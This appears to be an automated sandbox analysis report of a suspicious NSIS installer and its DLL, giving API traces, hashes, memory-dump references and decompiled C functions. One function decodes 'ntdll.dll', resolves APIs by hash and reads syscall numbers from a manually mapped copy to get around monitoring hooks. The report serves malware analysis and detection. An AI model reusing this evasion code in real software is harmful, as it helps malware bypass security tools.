                                                                                                                                                                                                          0x0040176f
                                                                                                                                                                                                          0x00401774
                                                                                                                                                                                                          0x0040177c
                                                                                                                                                                                                          0x00401798
                                                                                                                                                                                                          0x0040177e
                                                                                                                                                                                                          0x0040177e
                                                                                                                                                                                                          0x0040177f
                                                                                                                                                                                                          0x0040177f
                                                                                                                                                                                                          0x0040179e
                                                                                                                                                                                                          0x004017a8
                                                                                                                                                                                                          0x004017a8
                                                                                                                                                                                                          0x004017ac
                                                                                                                                                                                                          0x004017af
                                                                                                                                                                                                          0x004017b4
                                                                                                                                                                                                          0x004017b6
                                                                                                                                                                                                          0x004017b8
                                                                                                                                                                                                          0x004017bd
                                                                                                                                                                                                          0x004017bd
                                                                                                                                                                                                          0x004017c8
                                                                                                                                                                                                          0x004017c8
                                                                                                                                                                                                          0x004017d9
                                                                                                                                                                                                          0x004017db
                                                                                                                                                                                                          0x004017db
                                                                                                                                                                                                          0x004017dc
                                                                                                                                                                                                          0x004017dc
                                                                                                                                                                                                          0x004017df
                                                                                                                                                                                                          0x004017e2
                                                                                                                                                                                                          0x004017e5
                                                                                                                                                                                                          0x004017e5
                                                                                                                                                                                                          0x004017ec
                                                                                                                                                                                                          0x004017fb
                                                                                                                                                                                                          0x00401800
                                                                                                                                                                                                          0x00401803
                                                                                                                                                                                                          0x00401806
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00401808
                                                                                                                                                                                                          0x0040180b
                                                                                                                                                                                                          0x00401865
                                                                                                                                                                                                          0x0040186a
                                                                                                                                                                                                          0x004015b0
                                                                                                                                                                                                          0x004027bf
                                                                                                                                                                                                          0x004027bf
                                                                                                                                                                                                          0x00402a5a
                                                                                                                                                                                                          0x00402a5d
                                                                                                                                                                                                          0x00402a5d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040180d
                                                                                                                                                                                                          0x00401813
                                                                                                                                                                                                          0x0040181e
                                                                                                                                                                                                          0x0040182b
                                                                                                                                                                                                          0x00401836
                                                                                                                                                                                                          0x0040184c
                                                                                                                                                                                                          0x0040184c
                                                                                                                                                                                                          0x0040184f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00401855
                                                                                                                                                                                                          0x00401855
                                                                                                                                                                                                          0x00401856
                                                                                                                                                                                                          0x00401873
                                                                                                                                                                                                          0x00402a63
                                                                                                                                                                                                          0x00402a63
                                                                                                                                                                                                          0x00402a63
                                                                                                                                                                                                          0x00401858
                                                                                                                                                                                                          0x00401858
                                                                                                                                                                                                          0x00401859
                                                                                                                                                                                                          0x00401492
                                                                                                                                                                                                          0x00402387
                                                                                                                                                                                                          0x00402387
                                                                                                                                                                                                          0x00402387
                                                                                                                                                                                                          0x00401856
                                                                                                                                                                                                          0x0040184f
                                                                                                                                                                                                          0x00402a65
                                                                                                                                                                                                          0x00402a69
                                                                                                                                                                                                          0x00402a69
                                                                                                                                                                                                          0x00401883
                                                                                                                                                                                                          0x00401888
                                                                                                                                                                                                          0x00401896
                                                                                                                                                                                                          0x0040189b
                                                                                                                                                                                                          0x004018a1
                                                                                                                                                                                                          0x004018a5
                                                                                                                                                                                                          0x004018a7
                                                                                                                                                                                                          0x004018af
                                                                                                                                                                                                          0x004018bb
                                                                                                                                                                                                          0x004018a9
                                                                                                                                                                                                          0x004018a9
                                                                                                                                                                                                          0x004018ad
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004018ad
                                                                                                                                                                                                          0x004018c4
                                                                                                                                                                                                          0x004018ca
                                                                                                                                                                                                          0x004018cc
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004018d2
                                                                                                                                                                                                          0x004018d2
                                                                                                                                                                                                          0x004018d5
                                                                                                                                                                                                          0x004018ed
                                                                                                                                                                                                          0x004018d7
                                                                                                                                                                                                          0x004018da
                                                                                                                                                                                                          0x004018e3
                                                                                                                                                                                                          0x004018e3
                                                                                                                                                                                                          0x004018f2
                                                                                                                                                                                                          0x004018f7
                                                                                                                                                                                                          0x00402382
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00402382
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401798
                                                                                                                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017C2
                                                                                                                                                                                                            • Part of subcall function 0040624D: lstrcpynA.KERNEL32(?,?,00000400,00403558,Setup Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 0040625A
                                                                                                                                                                                                            • Part of subcall function 00405374: lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
                                                                                                                                                                                                            • Part of subcall function 00405374: lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
                                                                                                                                                                                                            • Part of subcall function 00405374: lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
                                                                                                                                                                                                            • Part of subcall function 00405374: SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
                                                                                                                                                                                                            • Part of subcall function 00405374: SendMessageA.USER32 ref: 00405408
                                                                                                                                                                                                            • Part of subcall function 00405374: SendMessageA.USER32 ref: 00405422
                                                                                                                                                                                                            • Part of subcall function 00405374: SendMessageA.USER32 ref: 00405430
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsqE488.tmp\System.dll$Call
                                                                                                                                                                                                          • API String ID: 1941528284-2162539042
                                                                                                                                                                                                          • Opcode ID: 557ef526f42ec28edab53691d762c079f4bd310eaf31ddc110736b3ad8fce03f
                                                                                                                                                                                                          • Instruction ID: 5f47ace1ae7a1eefb157477671532b43bdd4633c8b8a9d03c9106597174e7376
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 557ef526f42ec28edab53691d762c079f4bd310eaf31ddc110736b3ad8fce03f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E418431900515BACF107BB58D45EAF3679DF05368F20827FF422B20E1DA7C9A529A6D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 722F370F, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 69%
                                                                                                                                                                                                          			E722F370F(intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				void* _v16;
				intOrPtr _v20;
				void* _v24;
				signed int _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void* _v76;
				intOrPtr _v80;
				signed char _v84;
				long _v88;
				short _v90;
				short _v92;
				short _v94;
				short _v96;
				short _v98;
				short _v100;
				short _v102;
				short _v104;
				short _v106;
				char _v108;
				short _t141;
				short _t142;
				short _t143;
				short _t144;
				short _t145;
				short _t146;
				short _t147;
				short _t148;
				short _t149;
				int _t165;
				signed int _t169;
				intOrPtr _t175;
				signed int _t195;
				signed int _t210;
				signed int _t222;

				_v24 = _v24 & 0x00000000;
				_v48 = _v48 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_t141 = 0x6e;
				_v108 = _t141;
				_t142 = 0x74;
				_v106 = _t142;
				_t143 = 0x64;
				_v104 = _t143;
				_t144 = 0x6c;
				_v102 = _t144;
				_t145 = 0x6c;
				_v100 = _t145;
				_t146 = 0x2e;
				_v98 = _t146;
				_t147 = 0x64;
				_v96 = _t147;
				_t148 = 0x6c;
				_v94 = _t148;
				_t149 = 0x6c;
				_v92 = _t149;
				_v90 = 0;
				_v16 = _v16 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_v36 = _v36 & 0x00000000;
				_t23 =  &_v44;
				 *_t23 = _v44 & 0x00000000;
				_t222 =  *_t23;
				_v20 = E722F458C();
				_v64 = E722F4634(_v20, 0x8a111d91);
				_v68 = E722F4634(_v20, 0x170c1ca1);
				_v52 = E722F4634(_v20, 0xa5f15738);
				_v72 = E722F4634(_v20, 0x433a3842);
				_v56 = E722F4634(_v20, 0xd6eb2188);
				_v60 = E722F4634(_v20, 0x50a26af);
				_v80 = E722F4634(_v20, 0x55e38b1f);
				_v44 = 1;
				while(1) {
					_v16 = CreateFileW(E722F478F(_t222,  &_v108), 0x80000000, 7, 0, 3, 0x80, 0);
					if(_v16 == 0xffffffff) {
						break;
					}
					_v36 = _v68(_v16, 0);
					__eflags = _v36 - 0xffffffff;
					if(_v36 != 0xffffffff) {
						_v12 = VirtualAlloc(0, _v36, 0x3000, 4);
						__eflags = _v12;
						if(_v12 != 0) {
							_t165 = ReadFile(_v16, _v12, _v36,  &_v88, 0);
							__eflags = _t165;
							if(_t165 != 0) {
								_v76 = _v12;
								_v32 = _v12 +  *((intOrPtr*)(_v76 + 0x3c));
								_t169 =  *(_v32 + 0x14) & 0x0000ffff;
								_t213 = _v32;
								_t68 = _t169 + 0x18; // 0x8000018
								_v40 = _v32 + _t68;
								_v24 = VirtualAlloc(0,  *(_v32 + 0x50), 0x3000, 4);
								__eflags = _v24;
								if(_v24 != 0) {
									E722F45A4(_t213, _v24, _v12,  *((intOrPtr*)(_v32 + 0x54)));
									_v28 = _v28 & 0x00000000;
									while(1) {
										_t175 = _v32;
										__eflags = _v28 - ( *(_t175 + 6) & 0x0000ffff);
										if(_v28 >= ( *(_t175 + 6) & 0x0000ffff)) {
											break;
										}
										E722F45A4(_v40, _v24 +  *((intOrPtr*)(_v40 + 0xc + _v28 * 0x28)), _v12 +  *((intOrPtr*)(_v40 + 0x14 + _v28 * 0x28)),  *((intOrPtr*)(_v40 + 0x10 + _v28 * 0x28)));
										_t210 = _v28 + 1;
										__eflags = _t210;
										_v28 = _t210;
									}
									_v48 = E722F4634(_v24, _a4);
									__eflags = _v48;
									if(_v48 != 0) {
										__eflags = _v16;
										if(_v16 != 0) {
											CloseHandle(_v16);
										}
										__eflags = _v12;
										if(_v12 != 0) {
											VirtualFree(_v12, 0, 0x8000);
										}
										_v44 = _v44 & 0x00000000;
										__eflags = 0;
										if(0 != 0) {
											continue;
										}
									} else {
									}
								} else {
								}
							} else {
							}
						} else {
						}
					} else {
					}
					L22:
					if(_v44 != 0) {
						if(_v16 != 0) {
							_v56(_v16);
						}
						_v80(0);
					}
					_v8 = _v48;
					while(1 != 0) {
						if(( *_v8 & 0x000000ff) != 0xb8) {
							__eflags = ( *_v8 & 0x000000ff) - 0xe9;
							if(( *_v8 & 0x000000ff) != 0xe9) {
								__eflags = ( *_v8 & 0x000000ff) - 0xea;
								if(( *_v8 & 0x000000ff) != 0xea) {
									_t195 = _v8 + 1;
									__eflags = _t195;
									_v8 = _t195;
								} else {
									_v8 =  *(_v8 + 1);
								}
							} else {
								_t125 =  *(_v8 + 1) + 5; // 0x5
								_v8 = _v8 + _t125;
							}
							continue;
						} else {
						}
						break;
					}
					_v8 = _v8 + 1;
					_v84 =  *_v8;
					if(_v24 != 0) {
						VirtualFree(_v24, 0, 0x8000);
					}
					return _v84;
				}
				goto L22;
			}

















































                                                                                                                                                                                                          0x722f3715
                                                                                                                                                                                                          0x722f3719
                                                                                                                                                                                                          0x722f371d
                                                                                                                                                                                                          0x722f3723
                                                                                                                                                                                                          0x722f3724
                                                                                                                                                                                                          0x722f372a
                                                                                                                                                                                                          0x722f372b
                                                                                                                                                                                                          0x722f3731
                                                                                                                                                                                                          0x722f3732
                                                                                                                                                                                                          0x722f3738
                                                                                                                                                                                                          0x722f3739
                                                                                                                                                                                                          0x722f373f
                                                                                                                                                                                                          0x722f3740
                                                                                                                                                                                                          0x722f3746
                                                                                                                                                                                                          0x722f3747
                                                                                                                                                                                                          0x722f374d
                                                                                                                                                                                                          0x722f374e
                                                                                                                                                                                                          0x722f3754
                                                                                                                                                                                                          0x722f3755
                                                                                                                                                                                                          0x722f375b
                                                                                                                                                                                                          0x722f375c
                                                                                                                                                                                                          0x722f3762
                                                                                                                                                                                                          0x722f3766
                                                                                                                                                                                                          0x722f376a
                                                                                                                                                                                                          0x722f376e
                                                                                                                                                                                                          0x722f3772
                                                                                                                                                                                                          0x722f3772
                                                                                                                                                                                                          0x722f3772
                                                                                                                                                                                                          0x722f377b
                                                                                                                                                                                                          0x722f378b
                                                                                                                                                                                                          0x722f379b
                                                                                                                                                                                                          0x722f37ab
                                                                                                                                                                                                          0x722f37bb
                                                                                                                                                                                                          0x722f37cb
                                                                                                                                                                                                          0x722f37db
                                                                                                                                                                                                          0x722f37eb
                                                                                                                                                                                                          0x722f37ee
                                                                                                                                                                                                          0x722f37f5
                                                                                                                                                                                                          0x722f3814
                                                                                                                                                                                                          0x722f381b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x722f382a
                                                                                                                                                                                                          0x722f382d
                                                                                                                                                                                                          0x722f3831
                                                                                                                                                                                                          0x722f3847
                                                                                                                                                                                                          0x722f384a
                                                                                                                                                                                                          0x722f384e
                                                                                                                                                                                                          0x722f3864
                                                                                                                                                                                                          0x722f3867
                                                                                                                                                                                                          0x722f3869
                                                                                                                                                                                                          0x722f3873
                                                                                                                                                                                                          0x722f387f
                                                                                                                                                                                                          0x722f3885
                                                                                                                                                                                                          0x722f3889
                                                                                                                                                                                                          0x722f388c
                                                                                                                                                                                                          0x722f3890
                                                                                                                                                                                                          0x722f38a5
                                                                                                                                                                                                          0x722f38a8
                                                                                                                                                                                                          0x722f38ac
                                                                                                                                                                                                          0x722f38bf
                                                                                                                                                                                                          0x722f38c4
                                                                                                                                                                                                          0x722f38d1
                                                                                                                                                                                                          0x722f38d1
                                                                                                                                                                                                          0x722f38d8
                                                                                                                                                                                                          0x722f38db
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x722f3906
                                                                                                                                                                                                          0x722f38cd
                                                                                                                                                                                                          0x722f38cd
                                                                                                                                                                                                          0x722f38ce
                                                                                                                                                                                                          0x722f38ce
                                                                                                                                                                                                          0x722f3918
                                                                                                                                                                                                          0x722f391b
                                                                                                                                                                                                          0x722f391f
                                                                                                                                                                                                          0x722f3923
                                                                                                                                                                                                          0x722f3927
                                                                                                                                                                                                          0x722f392c
                                                                                                                                                                                                          0x722f392c
                                                                                                                                                                                                          0x722f392f
                                                                                                                                                                                                          0x722f3933
                                                                                                                                                                                                          0x722f393f
                                                                                                                                                                                                          0x722f393f
                                                                                                                                                                                                          0x722f3942
                                                                                                                                                                                                          0x722f3946
                                                                                                                                                                                                          0x722f3948
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x722f3921
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x722f38ae
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x722f386b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x722f3850
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x722f3833
                                                                                                                                                                                                          0x722f394e
                                                                                                                                                                                                          0x722f3952
                                                                                                                                                                                                          0x722f3958
                                                                                                                                                                                                          0x722f395d
                                                                                                                                                                                                          0x722f395d
                                                                                                                                                                                                          0x722f3962
                                                                                                                                                                                                          0x722f3962
                                                                                                                                                                                                          0x722f3968
                                                                                                                                                                                                          0x722f396b
                                                                                                                                                                                                          0x722f397b
                                                                                                                                                                                                          0x722f3985
                                                                                                                                                                                                          0x722f398a
                                                                                                                                                                                                          0x722f39a4
                                                                                                                                                                                                          0x722f39a9
                                                                                                                                                                                                          0x722f39b9
                                                                                                                                                                                                          0x722f39b9
                                                                                                                                                                                                          0x722f39ba
                                                                                                                                                                                                          0x722f39ab
                                                                                                                                                                                                          0x722f39b1
                                                                                                                                                                                                          0x722f39b1
                                                                                                                                                                                                          0x722f398c
                                                                                                                                                                                                          0x722f3995
                                                                                                                                                                                                          0x722f3999
                                                                                                                                                                                                          0x722f3999
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x722f397d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x722f397b
                                                                                                                                                                                                          0x722f39c3
                                                                                                                                                                                                          0x722f39cb
                                                                                                                                                                                                          0x722f39d2
                                                                                                                                                                                                          0x722f39de
                                                                                                                                                                                                          0x722f39de
                                                                                                                                                                                                          0x722f39e7
                                                                                                                                                                                                          0x722f39e7
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 722F3811
                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 722F39DE
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2167863165.00000000722F3000.00000040.00020000.sdmp, Offset: 722F0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167849303.00000000722F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167854070.00000000722F1000.00000080.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167858720.00000000722F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167867973.00000000722F5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateFileFreeVirtual
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 204039940-0
                                                                                                                                                                                                          • Opcode ID: 1a27eacef18cec4e83dd66d6f105d4ce73f2ffecc6ce0885b3943496d180ad0d
                                                                                                                                                                                                          • Instruction ID: fd2b217d06061070944677689e0e2c4f6c4d9d486b0fa98e146ec4fbcce3de6c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a27eacef18cec4e83dd66d6f105d4ce73f2ffecc6ce0885b3943496d180ad0d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 30A1F170D14249EFDF11CFE8C985BADFBB1BF08315F20845AEA11BA2A4D3759A91DB10
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040583A, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E0040583A(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x408384;
				_v36.Group = 0x408384;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x408374;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                                                                                                                                                                          0x00405845
                                                                                                                                                                                                          0x00405849
                                                                                                                                                                                                          0x0040584c
                                                                                                                                                                                                          0x00405852
                                                                                                                                                                                                          0x00405856
                                                                                                                                                                                                          0x0040585a
                                                                                                                                                                                                          0x00405862
                                                                                                                                                                                                          0x00405869
                                                                                                                                                                                                          0x0040586f
                                                                                                                                                                                                          0x00405876
                                                                                                                                                                                                          0x0040587d
                                                                                                                                                                                                          0x00405885
                                                                                                                                                                                                          0x00405887
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405887
                                                                                                                                                                                                          0x00405891
                                                                                                                                                                                                          0x00405898
                                                                                                                                                                                                          0x004058ae
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004058b0
                                                                                                                                                                                                          0x004058b4

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040587D
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00405891
                                                                                                                                                                                                          • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004058A6
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004058B0
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • C:\Users\Public, xrefs: 0040583A
                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405860
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\Public
                                                                                                                                                                                                          • API String ID: 3449924974-2845914341
                                                                                                                                                                                                          • Opcode ID: df2ca303ac227c9e0d0fbc5e27afd1aa0bff8a01fb2d8cf1edb312bec269ebc1
                                                                                                                                                                                                          • Instruction ID: 86bcb966140a1f7c96d74b09234fd9797acdbeb10da2454792965a81b57d7874
                                                                                                                                                                                                          • Opcode Fuzzy Hash: df2ca303ac227c9e0d0fbc5e27afd1aa0bff8a01fb2d8cf1edb312bec269ebc1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80011A72D00219DAEF10DFA0C944BEFBBB8EF04355F00803ADA45B6290D7799659CF99
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004065E8, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E004065E8(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x40a014; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}








                                                                                                                                                                                                          0x004065ff
                                                                                                                                                                                                          0x00406608
                                                                                                                                                                                                          0x0040660a
                                                                                                                                                                                                          0x0040660a
                                                                                                                                                                                                          0x0040660e
                                                                                                                                                                                                          0x00406620
                                                                                                                                                                                                          0x0040661a
                                                                                                                                                                                                          0x0040661a
                                                                                                                                                                                                          0x0040661a
                                                                                                                                                                                                          0x00406624
                                                                                                                                                                                                          0x00406638
                                                                                                                                                                                                          0x0040664c
                                                                                                                                                                                                          0x00406653

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004065FF
                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00406638
                                                                                                                                                                                                          • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040664C
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                                          • String ID: %s%s.dll$UXTHEME$\
                                                                                                                                                                                                          • API String ID: 2200240437-4240819195
                                                                                                                                                                                                          • Opcode ID: dd037f00298a2975fe7e642a10d0852ddcb34bcb2038a79f7270f2bd0b83f80d
                                                                                                                                                                                                          • Instruction ID: 7902db4e393e31f005eed81eae05c73ad43ba894215c6af4be7b8d9a3309d3f8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: dd037f00298a2975fe7e642a10d0852ddcb34bcb2038a79f7270f2bd0b83f80d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26F0217050020967EB149764DD0DFFB375CAB08304F14047BA586F10D1DAB9D5358F6D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 722F42C8, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207filememoryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 71%
                                                                                                                                                                                                          			E722F42C8(void* __ecx, void* __edx, void* __eflags, WCHAR* _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char _v45;
				char _v46;
				char _v47;
				char _v48;
				char _v49;
				char _v50;
				char _v51;
				char _v52;
				char _v53;
				char _v54;
				char _v55;
				char _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				long _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				signed int _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				char _v140;
				char _v208;
				char _v1248;
				signed int _t124;
				void* _t126;
				void* _t130;
				signed int _t131;
				void* _t132;
				int _t134;
				int _t137;
				signed int _t147;
				void* _t149;
				signed int _t150;
				void* _t152;
				signed int _t153;
				void* _t155;
				void* _t156;
				void* _t157;
				void* _t158;
				void* _t159;

				_t159 = __eflags;
				_t157 = __edx;
				_t156 = __ecx;
				_v20 = _v20 & 0x00000000;
				_v84 = _v84 & 0x00000000;
				_v56 = 0x37;
				_v55 = 0x33;
